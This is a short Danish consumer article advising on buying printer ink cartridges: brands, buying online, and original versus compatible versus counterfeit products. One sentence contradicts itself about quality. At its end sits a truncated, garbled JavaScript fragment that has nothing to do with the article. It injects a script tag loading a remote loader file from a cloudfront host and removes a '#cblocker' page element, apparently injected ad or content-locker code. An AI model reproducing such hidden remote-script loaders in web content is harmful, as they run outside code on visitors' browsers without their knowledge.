Gode råd ved køb af blækpatroner

Når du skal ud og købe blækpatroner til din printer, er der nogle ting, som du er nødt til at undersøge først. For det første skal du vide hvilken slags blækpatron, som du skal bruge. Der findes mange forskellige mærker, nogle af de mest kendte er blækpatroner canon og blækpatroner hp. Det kommer an på hvilken printer du har, om du skal købe den ene eller den anden, eller en helt tredje som blækpatroner brother.
Oftest kan man spare penge ved at købe sine blækpatroner på internettet, så det kan godt betale sig at undersøge de forskellige forhandlere.

Originale eller kompatible?
Dog skal det siges, at man skal være opmærksom på om man vil købe originale blækpatroner eller om man vil forsøge sig med kompatible blækpatroner. Forskellen på disse to, er at originale er produceret af printerproducenten selv, hvor kompatible er produceret af en anden virksomhed. Man kan godt spare penge ved at købe kompatible patroner, og nogle kan kvaliteten af blækpatronen rent faktisk være højere end hos originalproducenten, men det er mere reglen end undtagelsen.

Piratkopier
Der er også forskel på at købe kompatible blækpatroner og piratkopier. Piratkopier har ikke patentbeskyttelse, og er faktisk bare en ren kopi og ofte en dårligere kopi af det originale, og man kan risikere at kvaliteten ikke er lige så god som fx originale brother blækpatroner.
Derimod har kompatible produkter patentbeskyttelse, og er udviklet til at erstatte de originale produkter, blot til en billigere pris. Det er altså et alternativ til det originale produkt, men ikke en ulovlig kopi af det, som piratkopierne er.
Derfor skal man altid være på vagt for piratkopier.

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>